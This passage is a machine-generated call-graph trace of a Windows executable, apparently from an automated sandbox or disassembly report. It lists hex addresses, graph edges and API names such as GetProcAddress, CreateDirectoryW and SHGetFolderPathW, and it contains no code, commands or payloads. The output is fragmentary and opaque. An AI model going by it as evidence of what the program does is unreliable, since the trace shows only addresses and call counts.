7ff7f132cc4c 2 API calls 89162->89163 89164 7ff7f132c9e8 89163->89164 89165 7ff7f132cc4c 2 API calls 89164->89165 89166 7ff7f132c9fb 89165->89166 89167 7ff7f132cc4c 2 API calls 89166->89167 89168 7ff7f132ca0e 89167->89168 89169 7ff7f132cc4c 2 API calls 89168->89169 89170 7ff7f132ca28 89169->89170 89171 7ff7f132cc4c 2 API calls 89170->89171 89172 7ff7f132ca3b 89171->89172 89173 7ff7f132cc4c 2 API calls 89172->89173 89174 7ff7f132ca4e 89173->89174 89175 7ff7f132cc4c 2 API calls 89174->89175 89176 7ff7f132ca61 89175->89176 89177 7ff7f132cc4c 2 API calls 89176->89177 89178 7ff7f132ca74 89177->89178 89179 7ff7f132cc4c 2 API calls 89178->89179 89180 7ff7f132ca87 89179->89180 89181 7ff7f132cc4c 2 API calls 89180->89181 89182 7ff7f132ca9a 89181->89182 89183 7ff7f132cc4c 2 API calls 89182->89183 89184 7ff7f132caad 89183->89184 89185 7ff7f132cc4c 2 API calls 89184->89185 89186 7ff7f132cac0 89185->89186 89187 7ff7f132cc4c 2 API calls 89186->89187 89188 7ff7f132cad3 89187->89188 89189 7ff7f132cc4c 2 API calls 89188->89189 89190 7ff7f132cae6 89189->89190 89191 7ff7f132cc4c 2 API calls 89190->89191 89192 7ff7f132caf9 89191->89192 89193 7ff7f132cc4c 2 API calls 89192->89193 89194 7ff7f132cb0c 89193->89194 89195 7ff7f132cc4c 2 API calls 89194->89195 89196 7ff7f132cb1f 89195->89196 89197 7ff7f132cc4c 2 API calls 89196->89197 89198 7ff7f132cb32 89197->89198 89199 7ff7f132cc4c 2 API calls 89198->89199 89200 7ff7f132cb45 89199->89200 89201 7ff7f132cc4c 2 API calls 89200->89201 89202 7ff7f132cb58 89201->89202 89203 7ff7f132cc4c 2 API calls 89202->89203 89204 7ff7f132cb6b 89203->89204 89205 7ff7f132cc4c 2 API calls 89204->89205 89206 7ff7f132cb7e 89205->89206 89207 7ff7f132cc4c 2 API calls 89206->89207 89208 7ff7f132cb91 89207->89208 89209 7ff7f132cc4c 2 API calls 89208->89209 89210 7ff7f132cba4 89209->89210 89211 7ff7f132cc4c 2 API calls 89210->89211 89212 7ff7f132cbb7 89211->89212 89213 7ff7f132cc4c 2 API calls 89212->89213 89214 7ff7f132cbca 89213->89214 89215 7ff7f132cc4c 2 API calls 89214->89215 89216 7ff7f132cbdd 89215->89216 89217 7ff7f132cc4c 2 API calls 89216->89217 89218 7ff7f132cbf0 89217->89218 89219 7ff7f132cc4c 2 API calls 89218->89219 89220 7ff7f132cc03 89219->89220 89221 7ff7f132cc4c 2 API calls 89220->89221 89222 7ff7f132cc16 89221->89222 89223 7ff7f132cc4c 2 API calls 89222->89223 89224 7ff7f132cc29 89223->89224 89225 7ff7f132cc4c 2 API calls 89224->89225 89226 7ff7f132cc3c 89225->89226 89227 7ff7f132d3b0 89226->89227 89394 7ff7f132fa1c 89227->89394 89262 7ff7f132c677 89261->89262 89263 7ff7f132cc60 GetProcAddress 89261->89263 89262->89071 89263->89262 89265 7ff7f128ef8f 89264->89265 89283 7ff7f128f3c0 89265->89283 89267 7ff7f128f19d 89288 7ff7f128edc4 49 API calls 89267->89288 89268 7ff7f128f14d 89269 7ff7f128f160 89268->89269 89287 7ff7f128f794 49 API calls Concurrency::cancel_current_task 89268->89287 89276 7ff7f128f1f0 89269->89276 89273 7ff7f128f1dd 89289 7ff7f12ff300 RtlPcToFileHeader RaiseException 89273->89289 89275 7ff7f128f1ee 89326 7ff7f128f6e8 89276->89326 89281 7ff7f128f444 77 API calls 89282 7ff7f128f21c 89281->89282 89282->89083 89284 7ff7f128f3f0 89283->89284 89285 7ff7f128efc7 89284->89285 89290 7ff7f128f444 89284->89290 89285->89267 89285->89268 89287->89269 89288->89273 89289->89275 89291 7ff7f128f46b 89290->89291 89296 7ff7f128f4f3 89290->89296 89292 7ff7f128f3c0 77 API calls 89291->89292 89293 7ff7f128f478 89292->89293 89294 7ff7f128f4e0 89293->89294 89304 7ff7f1291354 89293->89304 89294->89296 89308 7ff7f128f794 49 API calls Concurrency::cancel_current_task 89294->89308 89296->89285 89298 7ff7f128f521 89309 7ff7f128edc4 49 API calls 89298->89309 89300 7ff7f128f563 89310 7ff7f12ff300 RtlPcToFileHeader RaiseException 89300->89310 89302 7ff7f128f574 89305 7ff7f1291371 89304->89305 89306 7ff7f128f48e 89304->89306 89305->89306 89311 7ff7f1306348 89305->89311 89306->89294 89306->89298 89308->89296 89309->89300 89310->89302 89312 7ff7f1306356 89311->89312 89314 7ff7f130635d 89311->89314 89324 7ff7f1306180 75 API calls 89312->89324 89315 7ff7f130635b 89314->89315 89317 7ff7f1306140 89314->89317 89315->89306 89325 7ff7f13099c4 EnterCriticalSection 89317->89325 89324->89315 89327 7ff7f128f70f 89326->89327 89341 7ff7f128a470 89327->89341 89329 7ff7f128f20a 89330 7ff7f128f578 89329->89330 89331 7ff7f128f3c0 77 API calls 89330->89331 89332 7ff7f128f59e 89331->89332 89333 7ff7f128f652 89332->89333 89334 7ff7f128f693 89332->89334 89335 7ff7f128f214 89333->89335 89391 7ff7f128f794 49 API calls Concurrency::cancel_current_task 89333->89391 89392 7ff7f128edc4 49 API calls 89334->89392 89335->89281 89338 7ff7f128f6d6 89393 7ff7f12ff300 RtlPcToFileHeader RaiseException 89338->89393 89340 7ff7f128f6e7 89366 7ff7f12fb234 89341->89366 89343 7ff7f128a48a 89344 7ff7f12fb234 std::_Lockit::_Lockit 6 API calls 89343->89344 89349 7ff7f128a4da 89343->89349 89346 7ff7f128a4af 89344->89346 89345 7ff7f12fb2ac std::_Lockit::~_Lockit LeaveCriticalSection 89348 7ff7f128a571 89345->89348 89370 7ff7f12fb2ac 89346->89370 89348->89329 89356 7ff7f128a527 89349->89356 89374 7ff7f1289cb0 84 API calls 2 library calls 89349->89374 89351 7ff7f128a539 89352 7ff7f128a57f 89351->89352 89353 7ff7f128a53f 89351->89353 89376 7ff7f1289874 49 API calls 2 library calls 89352->89376 89375 7ff7f12fb870 49 API calls std::_Facet_Register 89353->89375 89356->89345 89357 7ff7f128a584 89377 7ff7f12fb8b0 89357->89377 89361 7ff7f128a5c1 89362 7ff7f128a470 86 API calls 89361->89362 89363 7ff7f128a5cd 89362->89363 89387 7ff7f128a608 49 API calls 2 library calls 89363->89387 89365 7ff7f128a5f5 89365->89329 89367 7ff7f12fb243 89366->89367 89368 7ff7f12fb248 89366->89368 89388 7ff7f1318d28 6 API calls std::_Locinfo::_Locinfo_ctor 89367->89388 89368->89343 89371 7ff7f12fb2b7 LeaveCriticalSection 89370->89371 89373 7ff7f12fb2c0 89370->89373 89373->89349 89374->89351 89375->89356 89376->89357 89378 7ff7f12fb234 std::_Lockit::_Lockit 6 API calls 89377->89378 89379 7ff7f12fb8d2 89378->89379 89385 7ff7f12fb8f5 ctype __vcrt_freefls 89379->89385 89389 7ff7f12fbaa8 49 API calls std::_Facet_Register 89379->89389 89381 7ff7f12fb8ea 89390 7ff7f12fbad8 48 API calls std::locale::_Setgloballocale 89381->89390 89382 7ff7f12fb2ac std::_Lockit::~_Lockit LeaveCriticalSection 89384 7ff7f128a5b4 89382->89384 89386 7ff7f128a984 85 API calls 5 library calls 89384->89386 89385->89382 89386->89361 89387->89365 89389->89381 89390->89385 89391->89335 89392->89338 89393->89340 89395 7ff7f1330b3c 3 API calls 89394->89395 89396 7ff7f132fa39 89395->89396 89396->89396 89397 7ff7f128a7dc 49 API calls 89396->89397 89398 7ff7f132fa6b 89397->89398 89399 7ff7f132faa3 89398->89399 90902 7ff7f12902d0 49 API calls 2 library calls 89398->90902 89401 7ff7f1330c3c 50 API calls 89399->89401 89402 7ff7f132facc SetCurrentDirectoryW CreateDirectoryW 89401->89402 89403 7ff7f1290040 49 API calls 89402->89403 89404 7ff7f132fb0c 89403->89404 89405 7ff7f12900b4 49 API calls 89404->89405 89406 7ff7f132fb1e 89405->89406 89407 7ff7f128f840 47 API calls 89406->89407 89408 7ff7f132fb29 SetCurrentDirectoryW SetCurrentDirectoryW CreateDirectoryW 89407->89408 89409 7ff7f1290040 49 API calls 89408->89409 89410 7ff7f132fb7c SetCurrentDirectoryW 89409->89410 89557 7ff7f13312a4 89410->89557 89414 7ff7f132fbd4 89897 7ff7f1330cd8 89414->89897 89417 7ff7f12906c4 49 API calls 89418 7ff7f132fc1b 89417->89418 89942 7ff7f1331110 89418->89942 89421 7ff7f12906c4 49 API calls 89422 7ff7f132fc62 89421->89422 89965 7ff7f1332b70 89422->89965 89558 7ff7f128a7dc 49 API calls 89557->89558 89559 7ff7f1331332 89558->89559 90947 7ff7f132c560 89559->90947 89561 7ff7f1332ac5 89564 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89561->89564 89562 7ff7f1331349 89562->89561 89563 7ff7f128a7dc 49 API calls 89562->89563 89565 7ff7f1332acb 89562->89565 89566 7ff7f133143a 89563->89566 89564->89565 89568 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89565->89568 89567 7ff7f132c560 49 API calls 89566->89567 89571 7ff7f1331451 89567->89571 89569 7ff7f1332ad1 89568->89569 89570 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89569->89570 89572 7ff7f1332ad7 89570->89572 89571->89569 89571->89572 89573 7ff7f128a7dc 49 API calls 89571->89573 89575 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89572->89575 89574 7ff7f133152a 89573->89574 89576 7ff7f132c560 49 API calls 89574->89576 89577 7ff7f1332add 89575->89577 89579 7ff7f1331541 89576->89579 89578 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89577->89578 89581 7ff7f1332ae3 89578->89581 89579->89577 89580 7ff7f128a7dc 49 API calls 89579->89580 89579->89581 89582 7ff7f133161a 89580->89582 89583 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89581->89583 89584 7ff7f132c560 49 API calls 89582->89584 89585 7ff7f1332ae9 89583->89585 89587 7ff7f1331631 89584->89587 89586 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89585->89586 89588 7ff7f1332aef 89586->89588 89587->89585 89587->89588 89589 7ff7f128a7dc 49 API calls 89587->89589 89591 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89588->89591 89590 7ff7f133170d 89589->89590 89592 7ff7f132c560 49 API calls 89590->89592 89593 7ff7f1332af5 89591->89593 89595 7ff7f1331724 89592->89595 89594 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89593->89594 89597 7ff7f1332afb 89594->89597 89595->89593 89596 7ff7f128a7dc 49 API calls 89595->89596 89595->89597 89598 7ff7f13317fd 89596->89598 89600 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89597->89600 89599 7ff7f132c560 49 API calls 89598->89599 89603 7ff7f1331814 89599->89603 89601 7ff7f1332b01 89600->89601 89602 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89601->89602 89604 7ff7f1332b07 89602->89604 89603->89601 89603->89604 89605 7ff7f128a7dc 49 API calls 89603->89605 89607 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89604->89607 89606 7ff7f13318ea 89605->89606 89608 7ff7f132c560 49 API calls 89606->89608 89609 7ff7f1332b0d 89607->89609 89613 7ff7f1331901 89608->89613 89610 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89609->89610 89612 7ff7f1332b13 89610->89612 89611 7ff7f128a7dc 49 API calls 89614 7ff7f13319da 89611->89614 89616 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89612->89616 89613->89609 89613->89611 89613->89612 89615 7ff7f132c560 49 API calls 89614->89615 89620 7ff7f13319f1 89615->89620 89617 7ff7f1332b19 89616->89617 89618 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89617->89618 89621 7ff7f1332b1f 89618->89621 89619 7ff7f128a7dc 49 API calls 89622 7ff7f1331ac7 89619->89622 89620->89617 89620->89619 89620->89621 89624 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89621->89624 89623 7ff7f132c560 49 API calls 89622->89623 89628 7ff7f1331ade 89623->89628 89625 7ff7f1332b25 89624->89625 89626 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89625->89626 89627 7ff7f1332b2b 89626->89627 89632 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89627->89632 89628->89625 89628->89627 89629 7ff7f128a7dc 49 API calls 89628->89629 89630 7ff7f1331b8a 89629->89630 89631 7ff7f128a7dc 49 API calls 89630->89631 89633 7ff7f1331bb0 89631->89633 89634 7ff7f1332b31 89632->89634 89635 7ff7f132c560 49 API calls 89633->89635 89636 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89634->89636 89638 7ff7f1331bc7 89635->89638 89637 7ff7f1332b37 89636->89637 89639 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89637->89639 89638->89634 89638->89637 89640 7ff7f128a7dc 49 API calls 89638->89640 89641 7ff7f1332b3d 89639->89641 89642 7ff7f1331c6d 89640->89642 89645 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89641->89645 89643 7ff7f128a7dc 49 API calls 89642->89643 89644 7ff7f1331c93 89643->89644 89646 7ff7f132c560 49 API calls 89644->89646 89647 7ff7f1332b43 89645->89647 89650 7ff7f1331caa 89646->89650 89648 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89647->89648 89649 7ff7f1332b49 89648->89649 89652 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89649->89652 89650->89641 89650->89647 89651 7ff7f128a7dc 49 API calls 89650->89651 89653 7ff7f1331d50 89651->89653 89655 7ff7f1332b4f 89652->89655 89654 7ff7f128a7dc 49 API calls 89653->89654 89656 7ff7f1331d76 89654->89656 89658 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89655->89658 89657 7ff7f132c560 49 API calls 89656->89657 89661 7ff7f1331d8d 89657->89661 89659 7ff7f1332b55 89658->89659 89660 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89659->89660 89662 7ff7f1332b5b 89660->89662 89661->89649 89661->89655 89663 7ff7f128a7dc 49 API calls 89661->89663 89666 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89662->89666 89664 7ff7f1331e33 89663->89664 89665 7ff7f128a7dc 49 API calls 89664->89665 89667 7ff7f1331e59 89665->89667 89668 7ff7f1332b61 89666->89668 89669 7ff7f132c560 49 API calls 89667->89669 89670 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89668->89670 89672 7ff7f1331e6d 89669->89672 89671 7ff7f1332b67 89670->89671 89672->89659 89672->89662 89673 7ff7f128a7dc 49 API calls 89672->89673 89674 7ff7f1331f10 89673->89674 89675 7ff7f128a7dc 49 API calls 89674->89675 89676 7ff7f1331f36 89675->89676 89677 7ff7f132c560 49 API calls 89676->89677 89679 7ff7f1331f49 89677->89679 89678 7ff7f1331fb9 89680 7ff7f128a7dc 49 API calls 89678->89680 89679->89668 89679->89678 89681 7ff7f1332ac0 89679->89681 89682 7ff7f1331feb 89680->89682 89684 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89681->89684 89683 7ff7f128a7dc 49 API calls 89682->89683 89685 7ff7f1332011 89683->89685 89684->89561 89686 7ff7f132c560 49 API calls 89685->89686 89687 7ff7f1332025 89686->89687 89688 7ff7f133203f 89687->89688 90968 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89687->90968 89690 7ff7f1332062 89688->89690 90969 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89688->90969 89692 7ff7f128a7dc 49 API calls 89690->89692 89693 7ff7f1332091 89692->89693 89694 7ff7f128a7dc 49 API calls 89693->89694 89695 7ff7f13320b7 89694->89695 89696 7ff7f132c560 49 API calls 89695->89696 89697 7ff7f13320cb 89696->89697 89698 7ff7f13320e5 89697->89698 90970 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89697->90970 89700 7ff7f1332108 89698->89700 90971 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89698->90971 89702 7ff7f128a7dc 49 API calls 89700->89702 89703 7ff7f1332137 89702->89703 89704 7ff7f128a7dc 49 API calls 89703->89704 89705 7ff7f133215d 89704->89705 89706 7ff7f132c560 49 API calls 89705->89706 89707 7ff7f1332171 89706->89707 89708 7ff7f133218b 89707->89708 90972 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89707->90972 89710 7ff7f13321ae 89708->89710 90973 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89708->90973 89712 7ff7f128a7dc 49 API calls 89710->89712 89713 7ff7f13321dd 89712->89713 89714 7ff7f128a7dc 49 API calls 89713->89714 89715 7ff7f1332203 89714->89715 89716 7ff7f132c560 49 API calls 89715->89716 89717 7ff7f1332217 89716->89717 89718 7ff7f1332231 89717->89718 90974 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89717->90974 89720 7ff7f1332254 89718->89720 90975 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89718->90975 89722 7ff7f128a7dc 49 API calls 89720->89722 89723 7ff7f1332283 89722->89723 89724 7ff7f128a7dc 49 API calls 89723->89724 89725 7ff7f13322ac 89724->89725 89726 7ff7f132c560 49 API calls 89725->89726 89727 7ff7f13322c0 89726->89727 89728 7ff7f13322da 89727->89728 90976 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89727->90976 89730 7ff7f13322fd 89728->89730 90977 7ff7f128a430 47 API calls _invalid_parameter_noinfo_noreturn 89728->90977 89732 7ff7f133234e 89730->89732 90978 7ff7f12902d0 49 API calls 2 library calls 89730->90978 90955 7ff7f1292bdc 89732->90955 89736 7ff7f128f840 47 API calls 89737 7ff7f1332388 89736->89737 89738 7ff7f13323d1 89737->89738 90979 7ff7f12902d0 49 API calls 2 library calls 89737->90979 89740 7ff7f1292bdc 47 API calls 89738->89740 89741 7ff7f1332405 89740->89741 89742 7ff7f128f840 47 API calls 89741->89742 89743 7ff7f1332410 89742->89743 89744 7ff7f1332457 89743->89744 90980 7ff7f12902d0 49 API calls 2 library calls 89743->90980 89746 7ff7f1292bdc 47 API calls 89744->89746 89747 7ff7f1332487 89746->89747 89748 7ff7f128f840 47 API calls 89747->89748 89749 7ff7f1332491 89748->89749 89750 7ff7f13324da 89749->89750 90981 7ff7f12902d0 49 API calls 2 library calls 89749->90981 89752 7ff7f1292bdc 47 API calls 89750->89752 89753 7ff7f133250e 89752->89753 89754 7ff7f128f840 47 API calls 89753->89754 89755 7ff7f1332519 89754->89755 90959 7ff7f1290000 89755->90959 89758 7ff7f1292bdc 47 API calls 89759 7ff7f1332565 89758->89759 89760 7ff7f128f840 47 API calls 89759->89760 89761 7ff7f133256f 89760->89761 89762 7ff7f1290000 49 API calls 89761->89762 89763 7ff7f13325ab 89762->89763 89764 7ff7f1292bdc 47 API calls 89763->89764 89765 7ff7f13325bb 89764->89765 89766 7ff7f128f840 47 API calls 89765->89766 89767 7ff7f13325c5 89766->89767 89768 7ff7f1290000 49 API calls 89767->89768 89769 7ff7f1332601 89768->89769 89770 7ff7f1292bdc 47 API calls 89769->89770 89771 7ff7f1332611 89770->89771 89772 7ff7f128f840 47 API calls 89771->89772 89773 7ff7f133261b 89772->89773 89774 7ff7f1290000 49 API calls 89773->89774 89775 7ff7f1332657 89774->89775 89776 7ff7f1292bdc 47 API calls 89775->89776 89777 7ff7f1332667 89776->89777 89778 7ff7f128f840 47 API calls 89777->89778 89779 7ff7f1332671 89778->89779 89780 7ff7f1290000 49 API calls 89779->89780 89781 7ff7f13326b0 89780->89781 89782 7ff7f1292bdc 47 API calls 89781->89782 89783 7ff7f13326c0 89782->89783 89784 7ff7f128f840 47 API calls 89783->89784 89785 7ff7f13326ca 89784->89785 89786 7ff7f1290000 49 API calls 89785->89786 89787 7ff7f1332709 89786->89787 89788 7ff7f1292bdc 47 API calls 89787->89788 89789 7ff7f1332719 89788->89789 89790 7ff7f128f840 47 API calls 89789->89790 89791 7ff7f1332723 89790->89791 89792 7ff7f1290000 49 API calls 89791->89792 89793 7ff7f1332762 89792->89793 89794 7ff7f1292bdc 47 API calls 89793->89794 89795 7ff7f1332772 89794->89795 89796 7ff7f128f840 47 API calls 89795->89796 89797 7ff7f133277c 89796->89797 89798 7ff7f1290000 49 API calls 89797->89798 89799 7ff7f13327bb 89798->89799 89800 7ff7f1292bdc 47 API calls 89799->89800 89801 7ff7f13327cb 89800->89801 89802 7ff7f128f840 47 API calls 89801->89802 89803 7ff7f13327d5 89802->89803 89804 7ff7f1290000 49 API calls 89803->89804 89805 7ff7f13327ff 89804->89805 89806 7ff7f1292bdc 47 API calls 89805->89806 89807 7ff7f133280f 89806->89807 89808 7ff7f128f840 47 API calls 89807->89808 89809 7ff7f1332819 89808->89809 89810 7ff7f1290000 49 API calls 89809->89810 89811 7ff7f1332843 89810->89811 89812 7ff7f1292bdc 47 API calls 89811->89812 89813 7ff7f1332853 89812->89813 89814 7ff7f128f840 47 API calls 89813->89814 89815 7ff7f133285d 89814->89815 89816 7ff7f1290000 49 API calls 89815->89816 89817 7ff7f1332887 89816->89817 89818 7ff7f1292bdc 47 API calls 89817->89818 89819 7ff7f1332897 89818->89819 89820 7ff7f128f840 47 API calls 89819->89820 89821 7ff7f13328a1 89820->89821 89822 7ff7f1290000 49 API calls 89821->89822 89823 7ff7f13328cb 89822->89823 89824 7ff7f1292bdc 47 API calls 89823->89824 89825 7ff7f13328db 89824->89825 89826 7ff7f128f840 47 API calls 89825->89826 89827 7ff7f13328e5 89826->89827 89828 7ff7f1290000 49 API calls 89827->89828 89829 7ff7f133290f 89828->89829 89830 7ff7f1292bdc 47 API calls 89829->89830 89831 7ff7f133291f 89830->89831 89832 7ff7f128f840 47 API calls 89831->89832 89833 7ff7f1332929 89832->89833 89834 7ff7f1290000 49 API calls 89833->89834 89835 7ff7f1332953 89834->89835 89836 7ff7f1292bdc 47 API calls 89835->89836 89837 7ff7f1332963 89836->89837 89838 7ff7f128f840 47 API calls 89837->89838 89839 7ff7f133296d 89838->89839 89840 7ff7f1290000 49 API calls 89839->89840 89841 7ff7f1332997 89840->89841 89842 7ff7f1292bdc 47 API calls 89841->89842 89843 7ff7f13329a7 89842->89843 89844 7ff7f128f840 47 API calls 89843->89844 89845 7ff7f13329b1 89844->89845 90963 7ff7f128a36c 89845->90963 89847 7ff7f13329bb 89848 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89847->89848 89849 7ff7f13329c5 89848->89849 89850 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89849->89850 89851 7ff7f13329cf 89850->89851 89852 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89851->89852 89853 7ff7f13329d9 89852->89853 89854 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89853->89854 89855 7ff7f13329e3 89854->89855 89856 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89855->89856 89857 7ff7f13329ed 89856->89857 89858 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89857->89858 89859 7ff7f13329f7 89858->89859 89860 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89859->89860 89861 7ff7f1332a04 89860->89861 89862 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89861->89862 89863 7ff7f1332a11 89862->89863 89864 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89863->89864 89865 7ff7f1332a1e 89864->89865 89866 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89865->89866 89867 7ff7f1332a2b 89866->89867 89868 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89867->89868 89869 7ff7f1332a38 89868->89869 89870 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89869->89870 89871 7ff7f1332a45 89870->89871 89872 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89871->89872 89873 7ff7f1332a52 89872->89873 89874 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89873->89874 89875 7ff7f1332a5f 89874->89875 89876 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89875->89876 89877 7ff7f1332a6c 89876->89877 89878 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89877->89878 89879 7ff7f1332a79 89878->89879 89880 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89879->89880 89881 7ff7f1332a86 89880->89881 89882 7ff7f128a36c std::exception_ptr::_Current_exception 47 API calls 89881->89882 89883 7ff7f132fb98 89882->89883 89884 7ff7f12906c4 89883->89884 89885 7ff7f12906f4 89884->89885 89886 7ff7f129079c 89884->89886 89888 7ff7f12906fa ctype 89885->89888 89889 7ff7f129071b 89885->89889 89890 7ff7f12907a1 89885->89890 91054 7ff7f1289830 49 API calls std::_Xinvalid_argument 89886->91054 89888->89414 89889->89888 89891 7ff7f1290764 89889->89891 89892 7ff7f129075d 89889->89892 91055 7ff7f1289780 49 API calls 2 library calls 89890->91055 89895 7ff7f12fa2c4 std::_Facet_Register 49 API calls 89891->89895 89894 7ff7f128c840 49 API calls 89892->89894 89894->89888 89895->89888 89896 7ff7f12907a7 89898 7ff7f1330c3c 50 API calls 89897->89898 89899 7ff7f1330d03 89898->89899 89900 7ff7f12906c4 49 API calls 89899->89900 89901 7ff7f1330d35 89900->89901 89902 7ff7f12900b4 49 API calls 89901->89902 89903 7ff7f1330d4e 89902->89903 89904 7ff7f1330d8c 89903->89904 89906 7ff7f1331102 89903->89906 89905 7ff7f12906c4 49 API calls 89904->89905 89907 7ff7f1330dde 89905->89907 89909 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89906->89909 89908 7ff7f12906c4 49 API calls 89907->89908 89910 7ff7f1330e15 89908->89910 89911 7ff7f1331107 89909->89911 89912 7ff7f12906c4 49 API calls 89910->89912 89913 7ff7f1330e4c 89912->89913 89914 7ff7f12906c4 49 API calls 89913->89914 89915 7ff7f1330e83 89914->89915 89916 7ff7f12906c4 49 API calls 89915->89916 89917 7ff7f1330eba 89916->89917 89918 7ff7f12906c4 49 API calls 89917->89918 89919 7ff7f1330ef1 89918->89919 89920 7ff7f12906c4 49 API calls 89919->89920 89921 7ff7f1330f28 89920->89921 89922 7ff7f12906c4 49 API calls 89921->89922 89923 7ff7f1330f5f 89922->89923 89924 7ff7f12906c4 49 API calls 89923->89924 89925 7ff7f1330f99 89924->89925 89926 7ff7f12906c4 49 API calls 89925->89926 89927 7ff7f1330fd9 89926->89927 89928 7ff7f12906c4 49 API calls 89927->89928 89929 7ff7f1331019 89928->89929 89930 7ff7f12906c4 49 API calls 89929->89930 89931 7ff7f1331059 89930->89931 91056 7ff7f128f8e8 89931->91056 89933 7ff7f133108d 91069 7ff7f1330138 89933->91069 89935 7ff7f13310b4 89936 7ff7f128f840 47 API calls 89935->89936 89937 7ff7f13310d9 89936->89937 89938 7ff7f128f840 47 API calls 89937->89938 89939 7ff7f13310e4 89938->89939 89940 7ff7f128f840 47 API calls 89939->89940 89941 7ff7f132fbdf 89940->89941 89941->89417 91111 7ff7f1330628 SHGetFolderPathW 89942->91111 89945 7ff7f12906c4 49 API calls 89946 7ff7f1331162 89945->89946 89947 7ff7f12900b4 49 API calls 89946->89947 89948 7ff7f1331177 89947->89948 89949 7ff7f13311b3 89948->89949 89952 7ff7f1331298 89948->89952 89950 7ff7f12906c4 49 API calls 89949->89950 89951 7ff7f1331201 89950->89951 89954 7ff7f128f8e8 49 API calls 89951->89954 89953 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89952->89953 89955 7ff7f133129d 89953->89955 89956 7ff7f133122d 89954->89956 89957 7ff7f1330138 54 API calls 89956->89957 89958 7ff7f133124f 89957->89958 89959 7ff7f128f840 47 API calls 89958->89959 89960 7ff7f1331270 89959->89960 89961 7ff7f128f840 47 API calls 89960->89961 89962 7ff7f133127a 89961->89962 89963 7ff7f128f840 47 API calls 89962->89963 89964 7ff7f132fc26 89963->89964 89964->89421 89966 7ff7f1330c3c 50 API calls 89965->89966 89967 7ff7f1332b95 89966->89967 89968 7ff7f12906c4 49 API calls 89967->89968 89969 7ff7f1332bc0 89968->89969 89970 7ff7f12900b4 49 API calls 89969->89970 89971 7ff7f1332bd5 89970->89971 89972 7ff7f1332c11 89971->89972 89974 7ff7f1332d5b 89971->89974 89973 7ff7f12906c4 49 API calls 89972->89973 89975 7ff7f1332c62 89973->89975 89977 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89974->89977 89976 7ff7f12906c4 49 API calls 89975->89976 89978 7ff7f1332c95 89976->89978 89979 7ff7f1332d60 89977->89979 89980 7ff7f12906c4 49 API calls 89978->89980 89981 7ff7f1332cc8 89980->89981 89982 7ff7f128f8e8 49 API calls 89981->89982 89983 7ff7f1332cf4 89982->89983 89984 7ff7f1330138 54 API calls 89983->89984 89985 7ff7f1332d14 89984->89985 89986 7ff7f128f840 47 API calls 89985->89986 89987 7ff7f1332d35 89986->89987 89988 7ff7f128f840 47 API calls 89987->89988 89989 7ff7f1332d3f 89988->89989 89990 7ff7f128f840 47 API calls 89989->89990 89991 7ff7f132fc6d 89990->89991 89992 7ff7f132eb30 89991->89992 89993 7ff7f128a7dc 49 API calls 89992->89993 89994 7ff7f132ebbe 89993->89994 89995 7ff7f132c560 49 API calls 89994->89995 89996 7ff7f132ebd2 89995->89996 89997 7ff7f128a7dc 49 API calls 89996->89997 89999 7ff7f132f9ad 89996->89999 90068 7ff7f132f9a7 89996->90068 90000 7ff7f132ecc3 